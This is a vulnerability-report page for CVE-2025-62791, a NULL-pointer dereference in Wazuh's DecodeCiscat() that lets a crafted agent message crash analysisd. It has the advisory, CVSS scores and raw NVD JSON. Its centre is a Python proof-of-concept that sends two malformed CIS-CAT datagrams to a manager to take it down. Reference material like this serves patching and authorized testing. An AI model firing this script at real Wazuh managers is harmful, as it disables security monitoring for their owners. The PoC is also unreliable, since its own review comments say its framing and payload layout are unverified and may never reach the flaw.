Security Vulnerability Report
CVE-2025-62791 CVSS 7.5 HIGH

CVE-2025-62791

Published: 2025-10-29 17:15:37
Last Modified: 2025-11-03 19:34:47

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, the DecodeCiscat() implementation does not check the return value of cJSON_GetObjectItem() for a possible NULL value in case of an error. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE
Wazuh < 4.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-62791 PoC - Wazuh DecodeCiscat NULL Pointer Dereference

Sends two author-constructed CIS-CAT style messages to a Wazuh manager
address over UDP, on the premise that DecodeCiscat() (Wazuh < 4.11.0)
dereferences an unchecked cJSON_GetObjectItem() result.

NOTE(review): the wire framing (4-byte length prefix, single UDP datagram)
and the JSON field layout used below are the PoC author's own construction;
nothing in the advisory text reproduced on this page confirms that they
match what the manager accepts or which key DecodeCiscat() looks up, so
the script may never reach the affected code.  It also has no way to
observe the outcome (see the __main__ block).

Note: This is for educational and authorized testing purposes only.
"""
import socket
import json
import struct


def send_wazuh_message(target_ip, target_port, message):
    """Send one UDP datagram carrying *message* to (target_ip, target_port).

    Args:
        target_ip: destination host for the datagram.
        target_port: destination UDP port.
        message: text payload; encoded as UTF-8 before sending.

    Returns:
        True if sendto() completed, False if any exception was raised
        (the exception is printed, not re-raised).
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # Prepend message length as a big-endian uint32 ('>I').  This framing
        # is the author's choice; the advisory text on this page does not
        # describe the manager's wire format.
        msg_bytes = message.encode('utf-8')
        packet = struct.pack('>I', len(msg_bytes)) + msg_bytes
        sock.sendto(packet, (target_ip, target_port))
        # NOTE(review): if sendto() raises, this close() is skipped and the
        # socket is left to the garbage collector.
        sock.close()
        print(f"[+] Malformed message sent to {target_ip}:{target_port}")
        return True
    except Exception as e:
        # Broad catch: every failure is reported the same way and becomes
        # a False return, so callers cannot distinguish the cause.
        print(f"[-] Error sending message: {e}")
        return False


def generate_malformed_ciscat_message():
    """Build the first payload: a JSON document whose 'ciscat' object has
    'scan_id' and 'scan_time' set to JSON null.

    Returns:
        The document serialised with json.dumps() (default separators).
    """
    # The author's premise is that a key DecodeCiscat() looks up is absent,
    # so cJSON_GetObjectItem() returns NULL.  NOTE(review): the advisory text
    # on this page does not name that key; which field (if any) this shape
    # leaves missing is not established here.
    ciscat_data = {
        "type": "ciscat",
        "agent_id": "001",
        "timestamp": "2025-10-29T12:00:00Z",
        # 'ciscat' is present (not missing); its two sub-fields serialise
        # as null.
        "ciscat": {
            "scan_id": None,
            "scan_time": None
        }
    }
    # Outer envelope (origin / module / data), as chosen by the author.
    full_message = {
        "origin": "/var/ossec/etc/shared/agent.conf",
        "module": "ciscat",
        "data": ciscat_data
    }
    return json.dumps(full_message)


def generate_ciscat_crash_message():
    """Build the second payload: a colon-separated text prefix ending in '|'
    followed by a hand-written compact JSON object whose 'ciscat' value is
    {"error": true}.

    Returns:
        The concatenated string (not passed through json.dumps()).
    """
    # NOTE(review): this prefix format is the author's construction; the page
    # gives no source for it.  Unlike generate_malformed_ciscat_message(),
    # the JSON here is a literal string, so it is not validated at build time.
    message = "1:/var/ossec/etc/shared/agent.conf:ciscat|{"
    message += "\"type\":\"ciscat\",\"agent_id\":\"001\",\"ciscat\":{\"error\":true}}"
    return message


if __name__ == "__main__":
    # Deferred import: argparse is only needed when run as a script.
    import argparse
    parser = argparse.ArgumentParser(description='CVE-2025-62791 PoC')
    parser.add_argument('--target', default='127.0.0.1', help='Wazuh Manager IP')
    parser.add_argument('--port', type=int, default=1514, help='Wazuh Manager Port')
    args = parser.parse_args()
    print("[*] CVE-2025-62791 - Wazuh DecodeCiscat NULL Pointer Dereference")
    print("[*] Target:", args.target)
    print("[*] Generating malformed CIS-CAT message...")
    # Method 1: JSON document with null sub-fields
    message1 = generate_malformed_ciscat_message()
    send_wazuh_message(args.target, args.port, message1)
    # Method 2: prefixed, hand-written JSON
    message2 = generate_ciscat_crash_message()
    send_wazuh_message(args.target, args.port, message2)
    # NOTE(review): both return values above are discarded, so this line is
    # printed even if neither datagram was sent, and nothing here checks
    # whether analysisd on the target was affected.
    print("[*] Exploit sent. If vulnerable, analysisd will crash.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62791", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:37.133", "lastModified": "2025-11-03T19:34:46.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, DecodeCiscat() implementation does not check the return the value of cJSON_GetObjectItem() for a possible NULL value in case of an error. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.11.0", "matchCriteriaId": "7EBF4F2E-C12A-401D-8408-287D9EC5B0B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-gcwf-6p6m-gvm7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}